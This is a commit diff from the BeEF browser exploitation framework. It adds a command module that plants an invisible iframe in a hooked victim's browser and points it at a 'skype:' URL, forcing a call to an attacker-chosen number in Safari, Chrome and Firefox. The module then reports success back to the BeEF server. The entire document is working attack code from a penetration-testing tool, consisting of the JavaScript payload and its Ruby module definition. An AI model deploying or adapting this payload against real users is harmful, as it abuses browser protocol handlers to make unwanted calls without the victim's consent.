issue 269 : insecure URL schemes work in multiple browsers

git-svn-id: https://beef.googlecode.com/svn/trunk@741 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9

modules/commands/host/insecure_url_skype/insecure_url_skype.js

@@ -0,0 +1,5 @@
+beef.execute(function() {
+	var sploit = beef.dom.createInvisibleIframe();
+	sploit.src = 'skype:<%= @tel_num %>?cal';
+    beef.net.sendback("<%= @command_url %>", <%= @command_id %>, "result=IFrame Created!");
+});

modules/commands/host/insecure_url_skype/insecure_url_skype.rb

@@ -0,0 +1,55 @@
+module BeEF
+module Modules
+module Commands
+
+
+class Insecure_url_skype < BeEF::Command
+
+  #
+  # Defines and set up the command module.
+  #
+  def initialize
+    super({
+      'Name' => 'Insecure URL Handling - Skype Call',
+      'Description' => 'This module will force the browser to attempt a skype call. It will exploit the insecure handling of URL schemes<br>
+      <br>
+      The protocol handler used will be: skype',
+      'Category' => 'Host',
+      'Author' => 'xntrik, Nitesh Dhanjani',
+      'Data' => [
+        { 'name' => 'tel_num', 'ui_label'=>'Number', 'value' =>'5551234', 'width' => '200px' }
+      ],
+      'File' => __FILE__
+    })
+
+    set_target({
+      'verified_status' =>  VERIFIED_USER_NOTIFY, 
+      'browser_name' =>     S
+    })
+    
+    set_target({
+      'verified_status' => VERIFIED_USER_NOTIFY,
+      'browser_name' => C
+    })
+    
+    set_target({
+      'verified_status' => VERIFIED_USER_NOTIFY,
+      'browser_name' => FF
+    })
+
+    use 'beef.dom'
+    use_template!
+  end
+
+  def callback
+    content = {}
+    content['Result'] = @datastore['result']
+    save content
+
+  end
+
+end
+
+end
+end
+end